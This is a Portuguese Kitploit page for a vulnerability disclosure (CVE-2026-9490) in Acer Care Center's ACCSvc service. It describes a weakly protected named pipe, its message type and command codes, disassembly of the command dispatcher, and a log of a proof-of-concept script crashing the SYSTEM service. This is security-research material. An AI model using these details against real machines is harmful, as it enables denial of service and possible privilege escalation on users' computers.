Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-9490 — O serviço ACCSvc cria um pipe nomeado com um descritor de segurança fraco que permite que qualquer usuário autenticado se conecte e envie mensagens. Quando uma mensagem especialmente elaborada (tipo de mensagem 0x03) é enviada ao pipe, o serviço falha com o código de saída 1067 (ERROR_PROCESS_ABORTED). | Kitploit
Ferramentas/GitHubGitHub/ugvxb/cve-2026-9490
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoEngenharia ReversaTestes de PenetraçãoAnálise de Binários
GitHubugvxb/cve-2026-9490

CVE-2026-9490

Ver Repositório
4há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

O serviço ACCSvc cria um pipe nomeado com um descritor de segurança fraco que permite que qualquer usuário autenticado se conecte e envie mensagens. Quando uma mensagem especialmente elaborada (tipo de mensagem 0x03) é enviada ao pipe, o serviço falha com o código de saída 1067 (ERROR_PROCESS_ABORTED).

Compartilhar

ID do CVE: CVE-2026-9490
Pesquisador: Vo Duc Thang (ugvxb)
Reconhecimento: https://community.acer.com/en/kb/articles/19668

1. Resumo Executivo

Uma vulnerabilidade de segurança crítica foi identificada no serviço Acer Care Center (ACCSvc.exe). A vulnerabilidade permite que qualquer usuário local autenticado derrube o serviço do sistema (Negação de Serviço) e potencialmente eleve privilégios por meio de uma interface Named Pipe com segurança frágil.

O serviço, que é executado com privilégios de SYSTEM (LocalSystem), expõe um Named Pipe com controles de acesso excessivamente permissivos que concedem permissões de leitura, gravação e execução a todos os Usuários Autenticados.


2. Detalhes da Vulnerabilidade

2.1 Componente Afetado

AtributoValor
ProdutoAcer Care Center
ComponenteACCSvc.exe (Serviço ACC)
Nome do ServiçoACCSvc
Caminho de InstalaçãoC:\Program Files (x86)\Acer\Care Center\
Conta do ServiçoLocalSystem (NT AUTHORITY\SYSTEM)
Tipo de InicializaçãoAUTO_START
Named Pipe\.\pipe\treadstone_service_LightMode

2.2 Vulnerabilidade #1: Negação de Serviço

Descrição

O serviço ACCSvc cria um Named Pipe com um Descritor de Segurança fraco que permite que qualquer usuário autenticado se conecte e envie mensagens. Quando uma mensagem especialmente elaborada (tipo de mensagem 0x03) é enviada ao pipe, o serviço falha com o código de saída 1067 (ERROR_PROCESS_ABORTED).

Descritor de Segurança (SDDL)

root@kitploit:~
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)

Análise do SDDL

Impacto

Um usuário padrão, sem privilégios especiais, pode encerrar o serviço de sistema ACCSvc, fazendo com que a funcionalidade do Acer Care Center fique indisponível.

2.3 Vulnerabilidade #2: Potencial Escalação Local de Privilégios

Descrição

A mesma ACL fraca do Named Pipe permite que usuários autenticados enviem mensagens de comando que fazem o serviço executar aplicativos de inicialização via CreateProcessAsUserW.

Códigos de Comando

ComandoValor HexExecutável Alvo
0x19065102501ACCAPPLauncher.exe
0x19066102502ACCSWALauncher.exe
0x19067102503ACCFixpackFolderCleaner.exe

3. Análise Técnica

3.1 Análise do Binário

AtributoValor
ArquivoACCSvc.exe
TipoPE32+ executable (console) x86-64
Ferramenta de AnáliseRadare2

3.2 Principais Funções Identificadas

3.3 Parâmetros de Criação do Named Pipe

root@kitploit:~
Pipe Name:        \\.\pipe\treadstone_service_LightMode
dwOpenMode:       0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode:       0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances:    255
nOutBufferSize:   512
nInBufferSize:    512
nDefaultTimeOut:  1000ms

3.4 Lógica de Despacho de Comandos

root@kitploit:~
0x140008b1a      mov ebx, dword [rdx + rcx]     ; Read command
0x140008b1d      lea eax, [rbx - 0x19065]       ; Subtract base
0x140008b23      cmp eax, 2                      ; Check range
0x140008b26      ja  0x140008bde                 ; Jump if invalid

4. Resultados da Exploração

root@kitploit:~
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\Authenticated Users
        FILE_ADD_FILE
        FILE_CREATE_PIPE_INSTANCE
        FILE_APPEND_DATA
        FILE_EXECUTE
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
        
C:\Users\thang\Downloads\Acer>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ACC Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1067  (0x42b)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Resultado: Usuário padrão derrubou com sucesso o serviço SYSTEM!


5. Avaliação de Risco

5.1 Pontuação CVSS v4.0

MétricaValor
Vetor CVSS 4.0AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M
Pontuação Base CVSS6.8 (Média)

5.2 Classificações CWE

ID CWENome
CWE-269Gerenciamento Incorreto de Privilégios

6. Aviso Legal

Este PoC é apenas para fins educacionais e de pesquisa de segurança autorizada. O autor não é responsável por qualquer uso indevido. A exploração sem autorização é ilegal.

Baixar ferramenta
ACEPrincipalPermissãoAvaliação
(D;OICI;GA;;;BG)Convidados InternosNEGAR TUDOSeguro
(D;OICI;GA;;;AN)AnônimoNEGAR TUDOSeguro
(A;OICI;GRGWGX;;;AU)Usuários AutenticadosLeitura/Gravação/ExecuçãoVULNERÁVEL
(A;OICI;GA;;;BA)Administradores InternosPERMITIR TUDOEsperado
Ponto de Entrada0x14000fd4c
FunçãoEndereçoFinalidade
fcn.140009a700x140009a70CreateNamedPipeW - Cria o pipe vulnerável
fcn.1400075700x140007570CreateProcessAsUserW - Gera processos
fcn.14000a8a00x14000a8a0Manipulador de ReadFile
fcn.1400099500x140009950Manipulador de WriteFile
fcn.1400080500x140008050Despachante de mensagens